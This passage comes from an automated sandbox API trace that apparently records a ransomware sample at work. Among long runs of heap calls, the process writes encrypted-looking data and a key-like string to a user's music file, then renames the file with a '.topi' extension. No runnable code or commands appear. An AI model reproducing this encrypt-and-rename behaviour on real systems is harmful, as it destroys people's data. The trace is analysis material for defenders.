lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5210 [0099.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0099.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5228 [0099.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51f8 [0099.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5240 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5210 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0099.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5240 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5228 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51f8 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc0b8 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0099.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0099.067] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x6f73, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x6f73, lpOverlapped=0x0) returned 1 [0099.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0099.067] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6f78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.067] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0099.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0099.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.068] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0099.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.068] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0099.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0099.068] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.068] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.068] CloseHandle (hObject=0x6a8) returned 1 [0099.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6298 [0099.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0099.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6298 | out: hHeap=0x680000) returned 1 [0099.070] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\YVnKQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\yvnkq.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\YVnKQ.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\yvnkq.mp3.topi")) returned 1 [0099.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.070] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53b35200, ftCreationTime.dwHighDateTime=0x1d5be11, ftLastAccessTime.dwLowDateTime=0x30733180, ftLastAccessTime.dwHighDateTime=0x1d5c1fd, ftLastWriteTime.dwLowDateTime=0x30733180, ftLastWriteTime.dwHighDateTime=0x1d5c1fd, nFileSizeHigh=0x0, nFileSizeLow=0x6f78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YVnKQ.mp3", cAlternateFileName="")) returned 0 [0099.072] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f0f8 | out: hHeap=0x680000) returned 1 [0099.072] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0099.072] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.076] HeapFree (in: 